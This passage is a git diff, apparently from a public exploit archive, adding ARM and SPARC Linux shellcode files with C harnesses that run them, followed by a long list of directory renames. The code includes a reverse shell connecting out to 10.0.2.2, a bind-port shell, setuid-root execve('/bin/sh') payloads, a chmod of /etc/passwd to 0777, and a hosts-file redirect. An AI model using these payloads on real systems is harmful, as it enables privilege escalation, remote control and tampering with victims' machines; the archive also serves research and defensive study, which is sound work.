"\x01\xdf" + "\x31\x32\x37\x2e" // 127. + "\x31\x2e\x31\x2e" // 1.1. + "\x31\x20\x67\x6f" // 1 go + "\x6f\x67\x6c\x65" // ogle + "\x2e\x6c\x6b\x0a" // .lk + "\x2f\x65\x74\x63" + "\x2f\x2f\x68\x6f" + "\x73\x74\x73"; + +int main(void) { + fprintf(stdout,"Length: %d\n",strlen(shellcode)); + (*(void(*)()) shellcode)(); +return 0; +} \ No newline at end of file diff --git a/shellcodes/arm/43531.c b/shellcodes/arm/43531.c new file mode 100644 index 000000000..807f780b0 --- /dev/null +++ b/shellcodes/arm/43531.c @@ -0,0 +1,35 @@ +/* + Title : Linux/ARM - chmod("/etc/passwd", 0777) - 39 bytes + Date : 2013-09-04 + Author : gunslinger_ (yuda at cr0security dot com) + Tested on : ARM1176 rev6 (v6l) + + An ARM Hardcoded Shellcode without 0x20, 0x0a, and 0x00. + + Cr0security.com + +*/ +#include + +char *shellcode = "\x01\x60\x8f\xe2" // add r6, pc, #1 + "\x16\xff\x2f\xe1" // bx r6 + "\x78\x46" // mov r0, pc + "\x10\x30" // adds r0, #16 + "\xff\x21" // movs r1, #255 ; 0xff + "\xff\x31" // adds r1, #255 ; 0xff + "\x01\x31" // adds r1, #1 + "\x0f\x37" // adds r7, #15 + "\x01\xdf" // svc 1 + "\x40\x40" // eors r0, r0 + "\x01\x27" // movs r7, #1 + "\x01\xdf" // svc 1 + "\x2f\x65\x74\x63" // .word 0x6374652f + "\x2f\x70\x61\x73" // .word 0x7361702f + "\x73\x77" // .short 0x7773 + "\x64"; // .byte 0x64 + +int main(){ + fprintf(stdout,"Shellcode length: %d\n", strlen(shellcode)); + (*(void(*)()) shellcode)(); + return 0; +} \ No newline at end of file diff --git a/shellcodes/arm/43532.c b/shellcodes/arm/43532.c new file mode 100644 index 000000000..3236dfd88 --- /dev/null +++ b/shellcodes/arm/43532.c @@ -0,0 +1,35 @@ +/* + Title : Linux/ARM - creat("/root/pwned", 0777) - 39 bytes + Date : 2013-09-04 + Author : gunslinger_ (yuda at cr0security dot com) + Tested on : ARM1176 rev6 (v6l) + + An ARM Hardcoded Shellcode without 0x20, 0x0a, and 0x00. + + Cr0security.com + +*/ +#include + +char *shellcode = "\x01\x60\x8f\xe2" // add r6, pc, #1 + "\x16\xff\x2f\xe1" // bx r6 + "\x78\x46" // mov r0, pc + "\x10\x30" // adds r0, #16 + "\xff\x21" // movs r1, #255 ; 0xff + "\xff\x31" // adds r1, #255 ; 0xff + "\x01\x31" // adds r1, #1 + "\x08\x27" // adds r7, #8 + "\x01\xdf" // svc 1 + "\x40\x40" // eors r0, r0 + "\x01\x27" // movs r7, #1 + "\x01\xdf" // svc 1 + "\x2f\x72\x6f\x6f" // .word 0x6f6f722f + "\x74\x2f\x70\x77" // .word 0x77702f74 + "\x65\x63" // .short 0x656e + "\x64"; // .byte 0x64 + +int main(){ + fprintf(stdout,"Shellcode length: %d\n", strlen(shellcode)); + (*(void(*)()) shellcode)(); + return 0; +} \ No newline at end of file diff --git a/shellcodes/arm/43533.c b/shellcodes/arm/43533.c new file mode 100644 index 000000000..07c383fd5 --- /dev/null +++ b/shellcodes/arm/43533.c @@ -0,0 +1,34 @@ +/* + Title : Linux/ARM - execve("/bin/sh", [], [0 vars]) - 35 bytes + Date : 2013-09-04 + Author : gunslinger_ (yuda at cr0security dot com) + Tested on : ARM1176 rev6 (v6l) + + An ARM Hardcoded Shellcode without 0x20, 0x0a, and 0x00. + + Cr0security.com + +*/ +#include + +char *shellcode = "\x01\x60\x8f\xe2" // add r6, pc, #1 + "\x16\xff\x2f\xe1" // add bx r6 + "\x40\x40" // eors r0, r0 + "\x78\x44" // add r0, pc + "\x0c\x30" // adds r0, #12 + "\x49\x40" // eors r1, r1 + "\x52\x40" // eors r2, r2 + "\x0b\x27" // movs r7, #11 + "\x01\xdf" // svc 1 + "\x01\x27" // movs r7, #1 + "\x01\xdf" // svc 1 + "\x2f\x2f" // .short 0x2f2f + "\x62\x69\x6e\x2f" // .word 0x2f6e6962 + "\x2f\x73" // .short 0x732f + "\x68"; // .byte 0x68 + +int main(){ + fprintf(stdout,"Shellcode length: %d\n", strlen(shellcode)); + (*(void(*)()) shellcode)(); + return 0; +} \ No newline at end of file diff --git a/shellcodes/arm/43534.c b/shellcodes/arm/43534.c new file mode 100644 index 000000000..f8fc8d067 --- /dev/null +++ b/shellcodes/arm/43534.c @@ -0,0 +1,47 @@ +/* +Title: Linux/ARM - execve("/bin/sh",NULL,0) - 31 bytes +Date: 2010-08-31 +Tested: ARM926EJ-S rev 5 (v5l) +Author: Jonathan Salwan - twitter: @jonathansalwan +shell-storm.org + +Shellcode ARM without 0x20, 0x0a and 0x00 + + +00008054 <_start>: + 8054: e28f3001 add r3, pc, #1 ; 0x1 + 8058: e12fff13 bx r3 + 805c: 4678 mov r0, pc + 805e: 300c adds r0, #12 + 8060: 46c0 nop (mov r8, r8) + 8062: 9001 str r0, [sp, #4] + 8064: 1a49 subs r1, r1, r1 + 8066: 1a92 subs r2, r2, r2 + 8068: 270b movs r7, #11 + 806a: df01 svc 1 + 806c: 622f str r7, [r5, #32] + 806e: 6e69 ldr r1, [r5, #100] + 8070: 732f strb r7, [r5, #12] + 8072: 0068 lsls r0, r5, #1 + +*/ + + +#include + + +char *SC = "\x01\x30\x8f\xe2" + "\x13\xff\x2f\xe1" + "\x78\x46\x0c\x30" + "\xc0\x46\x01\x90" + "\x49\x1a\x92\x1a" + "\x0b\x27\x01\xdf" + "\x2f\x62\x69\x6e" + "\x2f\x73\x68"; + +int main(void) +{ + fprintf(stdout,"Length: %d\n",strlen(SC)); + (*(void(*)()) SC)(); +return 0; +} \ No newline at end of file diff --git a/shellcodes/arm/43536.c b/shellcodes/arm/43536.c new file mode 100644 index 000000000..010ca935b --- /dev/null +++ b/shellcodes/arm/43536.c @@ -0,0 +1,99 @@ +/* This ARM Thumb sc connects to a given IP and port with a shell. + * Intended for use with Android (hence /system/bin/sh). + * + * Connects to the provided IP and port with a shell + * + * no null bytes in the code, but does this really matter these days? + * it could be fixed with just a few instructions. + * + * Released to the public domain */ + +#include +#include + +#define SWAP16(x) ((x) << 8 | ((x) >> 8)) + +const unsigned char sc[] = { + /* Enter Thumb mode (for proof of concept) */ + 0x01, 0x10, 0x8F, 0xE2, 0x11, 0xFF, 0x2F, 0xE1, + + /* 16-bit instructions follow */ + 0x02, 0x20, 0x01, 0x21, 0x92, 0x1A, 0x0F, 0x02, 0x19, 0x37, 0x01, + 0xDF, 0x06, 0x1C, 0x08, 0xA1, 0x10, 0x22, 0x02, 0x37, 0x01, 0xDF, + 0x3F, 0x27, 0x02, 0x21, 0x30, 0x1c, 0x01, 0xdf, 0x01, 0x39, 0xFB, + 0xD5, 0x05, 0xA0, 0x92, 0x1a, 0x05, 0xb4, 0x69, 0x46, 0x0b, 0x27, + 0x01, 0xDF, 0xC0, 0x46, + + /* struct sockaddr */ + 0x02, 0x00, + /* port: 0x1234 */ + 0x12, 0x34, + /* ip: 10.0.2.2 */ + 0x0A, 0x00, 0x02, 0x02, + + /* "/system/bin/sh" */ + 0x2f, 0x73, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2f, 0x62, 0x69, 0x6e, + 0x2f, 0x73, 0x68, 0x00 +}; + +int main() +{ + printf("shellcode=%d bytes\n" + "connecting to %d.%d.%d.%d:%hd\n", sizeof sc, + sc[0x3c], sc[0x3d], sc[0x3e], sc[0x3f], + SWAP16(*((unsigned short *)(sc+0x3a)))); + return ((int (*)(void))sc)(); +} + +/* + * Assembly for those who are interested + * + +# switch to Thumb mode (16-bit ops) + .code 32 + add r1, pc, #1 + bx r1 + +# Thumb instructions follow + .code 16 + +# socket(2, 1, 0) + mov r0, #2 + mov r1, #1 + sub r2, r2, r2 + lsl r7, r1, #8 + add r7, r7, #25 + svc 1 + +# connect(r0, &addr, 16) + mov r6, r0 + add r1, pc, #32 + mov r2, #16 + add r7, #2 + svc 1 + +# dup2(r0, 0/1/2) + mov r7, #63 + mov r1, #2 +Lb: + mov r0, r6 + svc 1 + sub r1, #1 + bpl Lb + +# execve("/system/bin/sh", ["/system/bin/sh", 0], 0) + add r0, pc, #20 + sub r2, r2, r2 + push {r0, r2} + mov r1, sp + mov r7, #11 + svc 1 + +# struct sockaddr +.align 2 +.short 0x2 +.short 0x3412 # port +.byte 10,0,2,2 # IP +.ascii "/system/bin/sh\0\0" # shell + +***/ \ No newline at end of file diff --git a/shellcodes/arm/43537.c b/shellcodes/arm/43537.c new file mode 100644 index 000000000..c97f05415 --- /dev/null +++ b/shellcodes/arm/43537.c @@ -0,0 +1,10 @@ +/* + * 20 byte StrongARM/Linux setuid() shellcode + * funkysh + */ + +char shellcode[]= "\x02\x20\x42\xe0" /* sub r2, r2, r2 */ + "\x04\x10\x8f\xe2" /* add r1, pc, #4 */ + "\x12\x02\xa0\xe1" /* mov r0, r2, lsl r2 */ + "\x01\x20\xc1\xe5" /* strb r2, [r1, #1] */ + "\x17\x0b\x90\xef"; /* swi 0x90ff17 */ \ No newline at end of file diff --git a/shellcodes/arm/43538.c b/shellcodes/arm/43538.c new file mode 100644 index 000000000..9a877788b --- /dev/null +++ b/shellcodes/arm/43538.c @@ -0,0 +1,16 @@ +/* + * 47 byte StrongARM/Linux execve() shellcode + * funkysh + */ + +char shellcode[]= "\x02\x20\x42\xe0" /* sub r2, r2, r2 */ + "\x1c\x30\x8f\xe2" /* add r3, pc, #28 (0x1c) */ + "\x04\x30\x8d\xe5" /* str r3, [sp, #4] */ + "\x08\x20\x8d\xe5" /* str r2, [sp, #8] */ + "\x13\x02\xa0\xe1" /* mov r0, r3, lsl r2 */ + "\x07\x20\xc3\xe5" /* strb r2, [r3, #7 */ + "\x04\x30\x8f\xe2" /* add r3, pc, #4 */ + "\x04\x10\x8d\xe2" /* add r1, sp, #4 */ + "\x01\x20\xc3\xe5" /* strb r2, [r3, #1] */ + "\x0b\x0b\x90\xef" /* swi 0x90ff0b */ + "/bin/sh"; \ No newline at end of file diff --git a/shellcodes/arm/43539.c b/shellcodes/arm/43539.c new file mode 100644 index 000000000..62f047fff --- /dev/null +++ b/shellcodes/arm/43539.c @@ -0,0 +1,55 @@ +/* + * 203 byte StrongARM/Linux bind() portshell shellcode + * funkysh + */ + +char shellcode[]= "\x20\x60\x8f\xe2" /* add r6, pc, #32 */ + "\x07\x70\x47\xe0" /* sub r7, r7, r7 */ + "\x01\x70\xc6\xe5" /* strb r7, [r6, #1] */ + "\x01\x30\x87\xe2" /* add r3, r7, #1 */ + "\x13\x07\xa0\xe1" /* mov r0, r3, lsl r7 */ + "\x01\x20\x83\xe2" /* add r2, r3, #1 */ + "\x07\x40\xa0\xe1" /* mov r4, r7 */ + "\x0e\xe0\x4e\xe0" /* sub lr, lr, lr */ + "\x1c\x40\x2d\xe9" /* stmfd sp!, {r2-r4, lr} */ + "\x0d\x10\xa0\xe1" /* mov r1, sp */ + "\x66\xff\x90\xef" /* swi 0x90ff66 (socket) */ + "\x10\x57\xa0\xe1" /* mov r5, r0, lsl r7 */ + "\x35\x70\xc6\xe5" /* strb r7, [r6, #53] */ + "\x14\x20\xa0\xe3" /* mov r2, #20 */ + "\x82\x28\xa9\xe1" /* mov r2, r2, lsl #17 */ + "\x02\x20\x82\xe2" /* add r2, r2, #2 */ + "\x14\x40\x2d\xe9" /* stmfd sp!, {r2,r4, lr} */ + "\x10\x30\xa0\xe3" /* mov r3, #16 */ + "\x0d\x20\xa0\xe1" /* mov r2, sp */ + "\x0d\x40\x2d\xe9" /* stmfd sp!, {r0, r2, r3, lr} */ + "\x02\x20\xa0\xe3" /* mov r2, #2 */ + "\x12\x07\xa0\xe1" /* mov r0, r2, lsl r7 */ + "\x0d\x10\xa0\xe1" /* mov r1, sp */ + "\x66\xff\x90\xef" /* swi 0x90ff66 (bind) */ + "\x45\x70\xc6\xe5" /* strb r7, [r6, #69] */ + "\x02\x20\x82\xe2" /* add r2, r2, #2 */ + "\x12\x07\xa0\xe1" /* mov r0, r2, lsl r7 */ + "\x66\xff\x90\xef" /* swi 0x90ff66 (listen) */ + "\x5d\x70\xc6\xe5" /* strb r7, [r6, #93] */ + "\x01\x20\x82\xe2" /* add r2, r2, #1 */ + "\x12\x07\xa0\xe1" /* mov r0, r2, lsl r7 */ + "\x04\x70\x8d\xe5" /* str r7, [sp, #4] */ + "\x08\x70\x8d\xe5" /* str r7, [sp, #8] */ + "\x66\xff\x90\xef" /* swi 0x90ff66 (accept) */ + "\x10\x57\xa0\xe1" /* mov r5, r0, lsl r7 */ + "\x02\x10\xa0\xe3" /* mov r1, #2 */ + "\x71\x70\xc6\xe5" /* strb r7, [r6, #113] */ + "\x15\x07\xa0\xe1" /* mov r0, r5, lsl r7 */ + "\x3f\xff\x90\xef" /* swi 0x90ff3f (dup2) */ + "\x01\x10\x51\xe2" /* subs r1, r1, #1 */ + "\xfb\xff\xff\x5a" /* bpl */ + "\x99\x70\xc6\xe5" /* strb r7, [r6, #153] */ + "\x14\x30\x8f\xe2" /* add r3, pc, #20 */ + "\x04\x30\x8d\xe5" /* str r3, [sp, #4] */ + "\x04\x10\x8d\xe2" /* add r1, sp, #4 */ + "\x02\x20\x42\xe0" /* sub r2, r2, r2 */ + "\x13\x02\xa0\xe1" /* mov r0, r3, lsl r2 */ + "\x08\x20\x8d\xe5" /* str r2, [sp, #8] */ + "\x0b\xff\x90\xef" /* swi 0x900ff0b (execve) */ + "/bin/sh"; \ No newline at end of file diff --git a/shellcodes/hardware/27132.txt b/shellcodes/linux_mips/27132.txt similarity index 100% rename from shellcodes/hardware/27132.txt rename to shellcodes/linux_mips/27132.txt diff --git a/shellcodes/linux_sparc/43545.c b/shellcodes/linux_sparc/43545.c new file mode 100644 index 000000000..627eccc5e --- /dev/null +++ b/shellcodes/linux_sparc/43545.c @@ -0,0 +1,36 @@ +/* + * Linux/SPARC [setreuid(0,0); execve() of /bin/sh] shellcode. + */ + +char c0de[] = /* anathema < anathema@hack.co.za > */ +/* setreuid(0,0); */ +"\x82\x10\x20\x7e" /* mov 126, %g1 */ +"\x92\x22\x40\x09" /* sub %o1, %o1, %o1 */ +"\x90\x0a\x40\x09" /* and %o1, %o1, %o0 */ +"\x91\xd0\x20\x10" /* ta 0x10 */ + +/* execve() of /bin/sh */ +"\x2d\x0b\xd8\x9a" /* sethi %hi(0x2f626800), %l6 */ +"\xac\x15\xa1\x6e" /* or %l6, 0x16e, %l6 */ +"\x2f\x0b\xdc\xda" /* sethi %hi(0x2f736800), %l7 */ +"\x90\x0b\x80\x0e" /* and %sp, %sp, %o0 */ +"\x92\x03\xa0\x08" /* add %sp, 0x08, %o1 */ +"\x94\x22\x80\x0a" /* sub %o2, %o2, %o2 */ +"\x9c\x03\xa0\x10" /* add %sp, 0x10, %sp */ +"\xec\x3b\xbf\xf0" /* std %l6, [ %sp + - 16 ] */ +"\xd0\x23\xbf\xf8" /* st %o0, [ %sp + - 8 ] */ +"\xc0\x23\xbf\xfc" /* clr [ %sp + -4 ] */ +"\x82\x10\x20\x3b" /* mov 0x3b, %g1 */ +"\x91\xd0\x20\x10" /* ta 0x10 */ +; + +/* + * Test out the shellcode. + */ +main () +{ + void (*sc)() = (void *)c0de; + sc(); +} + +/* EOF */ \ No newline at end of file diff --git a/shellcodes/linux_sparc/43546.c b/shellcodes/linux_sparc/43546.c new file mode 100644 index 000000000..ec06b2cb5 --- /dev/null +++ b/shellcodes/linux_sparc/43546.c @@ -0,0 +1,16 @@ +/* + * Linux/SPARC + * + * setreuid(0, 0); (necessary, /bin/sh drops privs), standard execve(). + */ + +char c0de[] = /* by michel kaempf */ + + /* setuid( 0 ); */ + "\x90\x1a\x40\x09\x82\x10\x20\x17\x91\xd0\x20\x10" + /* setgid( 0 ); */ + "\x90\x1a\x40\x09\x82\x10\x20\x2e\x91\xd0\x20\x10" + /* Aleph One :) */ + "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e" + "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0" + "\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x10"; \ No newline at end of file diff --git a/shellcodes/lin_x86-64/13296.c b/shellcodes/linux_x86-64/13296.c similarity index 100% rename from shellcodes/lin_x86-64/13296.c rename to shellcodes/linux_x86-64/13296.c diff --git a/shellcodes/lin_x86-64/13320.c b/shellcodes/linux_x86-64/13320.c similarity index 100% rename from shellcodes/lin_x86-64/13320.c rename to shellcodes/linux_x86-64/13320.c diff --git a/shellcodes/lin_x86-64/13463.c b/shellcodes/linux_x86-64/13463.c similarity index 100% rename from shellcodes/lin_x86-64/13463.c rename to shellcodes/linux_x86-64/13463.c diff --git a/shellcodes/lin_x86-64/13464.s b/shellcodes/linux_x86-64/13464.s similarity index 100% rename from shellcodes/lin_x86-64/13464.s rename to shellcodes/linux_x86-64/13464.s diff --git a/shellcodes/lin_x86-64/13670.c b/shellcodes/linux_x86-64/13670.c similarity index 100% rename from shellcodes/lin_x86-64/13670.c rename to shellcodes/linux_x86-64/13670.c diff --git a/shellcodes/lin_x86-64/13688.c b/shellcodes/linux_x86-64/13688.c similarity index 100% rename from shellcodes/lin_x86-64/13688.c rename to shellcodes/linux_x86-64/13688.c diff --git a/shellcodes/lin_x86-64/13691.c b/shellcodes/linux_x86-64/13691.c similarity index 100% rename from shellcodes/lin_x86-64/13691.c rename to shellcodes/linux_x86-64/13691.c diff --git a/shellcodes/lin_x86-64/13908.c b/shellcodes/linux_x86-64/13908.c similarity index 100% rename from shellcodes/lin_x86-64/13908.c rename to shellcodes/linux_x86-64/13908.c diff --git a/shellcodes/lin_x86-64/13915.txt b/shellcodes/linux_x86-64/13915.txt similarity index 100% rename from shellcodes/lin_x86-64/13915.txt rename to shellcodes/linux_x86-64/13915.txt diff --git a/shellcodes/lin_x86-64/13943.c b/shellcodes/linux_x86-64/13943.c similarity index 100% rename from shellcodes/lin_x86-64/13943.c rename to shellcodes/linux_x86-64/13943.c diff --git a/shellcodes/lin_x86-64/14305.c b/shellcodes/linux_x86-64/14305.c similarity index 100% rename from shellcodes/lin_x86-64/14305.c rename to shellcodes/linux_x86-64/14305.c diff --git a/shellcodes/lin_x86-64/18197.c b/shellcodes/linux_x86-64/18197.c similarity index 100% rename from shellcodes/lin_x86-64/18197.c rename to shellcodes/linux_x86-64/18197.c diff --git a/shellcodes/lin_x86-64/18585.s b/shellcodes/linux_x86-64/18585.s similarity index 100% rename from shellcodes/lin_x86-64/18585.s rename to shellcodes/linux_x86-64/18585.s diff --git a/shellcodes/lin_x86-64/34667.c b/shellcodes/linux_x86-64/34667.c similarity index 100% rename from shellcodes/lin_x86-64/34667.c rename to shellcodes/linux_x86-64/34667.c diff --git a/shellcodes/lin_x86-64/35205.txt b/shellcodes/linux_x86-64/35205.txt similarity index 100% rename from shellcodes/lin_x86-64/35205.txt rename to shellcodes/linux_x86-64/35205.txt diff --git a/shellcodes/lin_x86-64/35586.c b/shellcodes/linux_x86-64/35586.c similarity index 100% rename from shellcodes/lin_x86-64/35586.c rename to shellcodes/linux_x86-64/35586.c diff --git a/shellcodes/lin_x86-64/35587.c b/shellcodes/linux_x86-64/35587.c similarity index 100% rename from shellcodes/lin_x86-64/35587.c rename to shellcodes/linux_x86-64/35587.c diff --git a/shellcodes/lin_x86-64/36359.c b/shellcodes/linux_x86-64/36359.c similarity index 100% rename from shellcodes/lin_x86-64/36359.c rename to shellcodes/linux_x86-64/36359.c diff --git a/shellcodes/lin_x86-64/36858.c b/shellcodes/linux_x86-64/36858.c similarity index 100% rename from shellcodes/lin_x86-64/36858.c rename to shellcodes/linux_x86-64/36858.c diff --git a/shellcodes/lin_x86-64/37362.c b/shellcodes/linux_x86-64/37362.c similarity index 100% rename from shellcodes/lin_x86-64/37362.c rename to shellcodes/linux_x86-64/37362.c diff --git a/shellcodes/lin_x86-64/37401.asm b/shellcodes/linux_x86-64/37401.asm similarity index 100% rename from shellcodes/lin_x86-64/37401.asm rename to shellcodes/linux_x86-64/37401.asm diff --git a/shellcodes/lin_x86-64/38150.txt b/shellcodes/linux_x86-64/38150.txt similarity index 100% rename from shellcodes/lin_x86-64/38150.txt rename to shellcodes/linux_x86-64/38150.txt diff --git a/shellcodes/lin_x86-64/38239.asm b/shellcodes/linux_x86-64/38239.asm similarity index 100% rename from shellcodes/lin_x86-64/38239.asm rename to shellcodes/linux_x86-64/38239.asm diff --git a/shellcodes/lin_x86-64/38469.c b/shellcodes/linux_x86-64/38469.c similarity index 100% rename from shellcodes/lin_x86-64/38469.c rename to shellcodes/linux_x86-64/38469.c diff --git a/shellcodes/lin_x86-64/38708.asm b/shellcodes/linux_x86-64/38708.asm similarity index 100% rename from shellcodes/lin_x86-64/38708.asm rename to shellcodes/linux_x86-64/38708.asm diff --git a/shellcodes/lin_x86-64/38815.c b/shellcodes/linux_x86-64/38815.c similarity index 100% rename from shellcodes/lin_x86-64/38815.c rename to shellcodes/linux_x86-64/38815.c diff --git a/shellcodes/lin_x86-64/39149.c b/shellcodes/linux_x86-64/39149.c similarity index 100% rename from shellcodes/lin_x86-64/39149.c rename to shellcodes/linux_x86-64/39149.c diff --git a/shellcodes/lin_x86-64/39152.c b/shellcodes/linux_x86-64/39152.c similarity index 100% rename from shellcodes/lin_x86-64/39152.c rename to shellcodes/linux_x86-64/39152.c diff --git a/shellcodes/lin_x86-64/39185.c b/shellcodes/linux_x86-64/39185.c similarity index 100% rename from shellcodes/lin_x86-64/39185.c rename to shellcodes/linux_x86-64/39185.c diff --git a/shellcodes/lin_x86-64/39203.c b/shellcodes/linux_x86-64/39203.c similarity index 100% rename from shellcodes/lin_x86-64/39203.c rename to shellcodes/linux_x86-64/39203.c diff --git a/shellcodes/lin_x86-64/39312.c b/shellcodes/linux_x86-64/39312.c similarity index 100% rename from shellcodes/lin_x86-64/39312.c rename to shellcodes/linux_x86-64/39312.c diff --git a/shellcodes/lin_x86-64/39383.c b/shellcodes/linux_x86-64/39383.c similarity index 100% rename from shellcodes/lin_x86-64/39383.c rename to shellcodes/linux_x86-64/39383.c diff --git a/shellcodes/lin_x86-64/39388.c b/shellcodes/linux_x86-64/39388.c similarity index 100% rename from shellcodes/lin_x86-64/39388.c rename to shellcodes/linux_x86-64/39388.c diff --git a/shellcodes/lin_x86-64/39390.c b/shellcodes/linux_x86-64/39390.c similarity index 100% rename from shellcodes/lin_x86-64/39390.c rename to shellcodes/linux_x86-64/39390.c diff --git a/shellcodes/lin_x86-64/39578.c b/shellcodes/linux_x86-64/39578.c similarity index 100% rename from shellcodes/lin_x86-64/39578.c rename to shellcodes/linux_x86-64/39578.c diff --git a/shellcodes/lin_x86-64/39617.c b/shellcodes/linux_x86-64/39617.c similarity index 100% rename from shellcodes/lin_x86-64/39617.c rename to shellcodes/linux_x86-64/39617.c diff --git a/shellcodes/lin_x86-64/39624.c b/shellcodes/linux_x86-64/39624.c similarity index 100% rename from shellcodes/lin_x86-64/39624.c rename to shellcodes/linux_x86-64/39624.c diff --git a/shellcodes/lin_x86-64/39625.c b/shellcodes/linux_x86-64/39625.c similarity index 100% rename from shellcodes/lin_x86-64/39625.c rename to shellcodes/linux_x86-64/39625.c diff --git a/shellcodes/lin_x86-64/39684.c b/shellcodes/linux_x86-64/39684.c similarity index 100% rename from shellcodes/lin_x86-64/39684.c rename to shellcodes/linux_x86-64/39684.c diff --git a/shellcodes/lin_x86-64/39700.c b/shellcodes/linux_x86-64/39700.c similarity index 100% rename from shellcodes/lin_x86-64/39700.c rename to shellcodes/linux_x86-64/39700.c diff --git a/shellcodes/lin_x86-64/39718.c b/shellcodes/linux_x86-64/39718.c similarity index 100% rename from shellcodes/lin_x86-64/39718.c rename to shellcodes/linux_x86-64/39718.c diff --git a/shellcodes/lin_x86-64/39758.c b/shellcodes/linux_x86-64/39758.c similarity index 100% rename from shellcodes/lin_x86-64/39758.c rename to shellcodes/linux_x86-64/39758.c diff --git a/shellcodes/lin_x86-64/39763.c b/shellcodes/linux_x86-64/39763.c similarity index 100% rename from shellcodes/lin_x86-64/39763.c rename to shellcodes/linux_x86-64/39763.c diff --git a/shellcodes/lin_x86-64/39847.c b/shellcodes/linux_x86-64/39847.c similarity index 100% rename from shellcodes/lin_x86-64/39847.c rename to shellcodes/linux_x86-64/39847.c diff --git a/shellcodes/lin_x86-64/39869.c b/shellcodes/linux_x86-64/39869.c similarity index 100% rename from shellcodes/lin_x86-64/39869.c rename to shellcodes/linux_x86-64/39869.c diff --git a/shellcodes/lin_x86-64/40029.c b/shellcodes/linux_x86-64/40029.c similarity index 100% rename from shellcodes/lin_x86-64/40029.c rename to shellcodes/linux_x86-64/40029.c diff --git a/shellcodes/lin_x86-64/40052.c b/shellcodes/linux_x86-64/40052.c similarity index 100% rename from shellcodes/lin_x86-64/40052.c rename to shellcodes/linux_x86-64/40052.c diff --git a/shellcodes/lin_x86-64/40061.c b/shellcodes/linux_x86-64/40061.c similarity index 100% rename from shellcodes/lin_x86-64/40061.c rename to shellcodes/linux_x86-64/40061.c diff --git a/shellcodes/lin_x86-64/40079.c b/shellcodes/linux_x86-64/40079.c similarity index 100% rename from shellcodes/lin_x86-64/40079.c rename to shellcodes/linux_x86-64/40079.c diff --git a/shellcodes/lin_x86-64/40122.txt b/shellcodes/linux_x86-64/40122.txt similarity index 100% rename from shellcodes/lin_x86-64/40122.txt rename to shellcodes/linux_x86-64/40122.txt diff --git a/shellcodes/lin_x86-64/40139.c b/shellcodes/linux_x86-64/40139.c similarity index 100% rename from shellcodes/lin_x86-64/40139.c rename to shellcodes/linux_x86-64/40139.c diff --git a/shellcodes/lin_x86-64/40808.c b/shellcodes/linux_x86-64/40808.c similarity index 100% rename from shellcodes/lin_x86-64/40808.c rename to shellcodes/linux_x86-64/40808.c diff --git a/shellcodes/lin_x86-64/41089.c b/shellcodes/linux_x86-64/41089.c similarity index 100% rename from shellcodes/lin_x86-64/41089.c rename to shellcodes/linux_x86-64/41089.c diff --git a/shellcodes/lin_x86-64/41128.c b/shellcodes/linux_x86-64/41128.c similarity index 100% rename from shellcodes/lin_x86-64/41128.c rename to shellcodes/linux_x86-64/41128.c diff --git a/shellcodes/lin_x86-64/41174.nasm b/shellcodes/linux_x86-64/41174.nasm similarity index 100% rename from shellcodes/lin_x86-64/41174.nasm rename to shellcodes/linux_x86-64/41174.nasm diff --git a/shellcodes/lin_x86-64/41398.nasm b/shellcodes/linux_x86-64/41398.nasm similarity index 100% rename from shellcodes/lin_x86-64/41398.nasm rename to shellcodes/linux_x86-64/41398.nasm diff --git a/shellcodes/lin_x86-64/41439.c b/shellcodes/linux_x86-64/41439.c similarity index 100% rename from shellcodes/lin_x86-64/41439.c rename to shellcodes/linux_x86-64/41439.c diff --git a/shellcodes/lin_x86-64/41468.nasm b/shellcodes/linux_x86-64/41468.nasm similarity index 100% rename from shellcodes/lin_x86-64/41468.nasm rename to shellcodes/linux_x86-64/41468.nasm diff --git a/shellcodes/lin_x86-64/41477.c b/shellcodes/linux_x86-64/41477.c similarity index 100% rename from shellcodes/lin_x86-64/41477.c rename to shellcodes/linux_x86-64/41477.c diff --git a/shellcodes/lin_x86-64/41498.nasm b/shellcodes/linux_x86-64/41498.nasm similarity index 100% rename from shellcodes/lin_x86-64/41498.nasm rename to shellcodes/linux_x86-64/41498.nasm diff --git a/shellcodes/lin_x86-64/41503.nasm b/shellcodes/linux_x86-64/41503.nasm similarity index 100% rename from shellcodes/lin_x86-64/41503.nasm rename to shellcodes/linux_x86-64/41503.nasm diff --git a/shellcodes/lin_x86-64/41509.nasm b/shellcodes/linux_x86-64/41509.nasm similarity index 100% rename from shellcodes/lin_x86-64/41509.nasm rename to shellcodes/linux_x86-64/41509.nasm diff --git a/shellcodes/lin_x86-64/41510.nsam b/shellcodes/linux_x86-64/41510.nsam similarity index 100% rename from shellcodes/lin_x86-64/41510.nsam rename to shellcodes/linux_x86-64/41510.nsam diff --git a/shellcodes/lin_x86-64/41750.txt b/shellcodes/linux_x86-64/41750.txt similarity index 100% rename from shellcodes/lin_x86-64/41750.txt rename to shellcodes/linux_x86-64/41750.txt diff --git a/shellcodes/lin_x86-64/41883.txt b/shellcodes/linux_x86-64/41883.txt similarity index 100% rename from shellcodes/lin_x86-64/41883.txt rename to shellcodes/linux_x86-64/41883.txt diff --git a/shellcodes/lin_x86-64/41970.asm b/shellcodes/linux_x86-64/41970.asm similarity index 100% rename from shellcodes/lin_x86-64/41970.asm rename to shellcodes/linux_x86-64/41970.asm diff --git a/shellcodes/lin_x86-64/42126.c b/shellcodes/linux_x86-64/42126.c similarity index 100% rename from shellcodes/lin_x86-64/42126.c rename to shellcodes/linux_x86-64/42126.c diff --git a/shellcodes/lin_x86-64/42179.c b/shellcodes/linux_x86-64/42179.c similarity index 100% rename from shellcodes/lin_x86-64/42179.c rename to shellcodes/linux_x86-64/42179.c diff --git a/shellcodes/lin_x86-64/42339.c b/shellcodes/linux_x86-64/42339.c similarity index 100% rename from shellcodes/lin_x86-64/42339.c rename to shellcodes/linux_x86-64/42339.c diff --git a/shellcodes/lin_x86-64/42485.c b/shellcodes/linux_x86-64/42485.c similarity index 100% rename from shellcodes/lin_x86-64/42485.c rename to shellcodes/linux_x86-64/42485.c diff --git a/shellcodes/lin_x86-64/42522.c b/shellcodes/linux_x86-64/42522.c similarity index 100% rename from shellcodes/lin_x86-64/42522.c rename to shellcodes/linux_x86-64/42522.c diff --git a/shellcodes/lin_x86-64/42523.c b/shellcodes/linux_x86-64/42523.c similarity index 100% rename from shellcodes/lin_x86-64/42523.c rename to 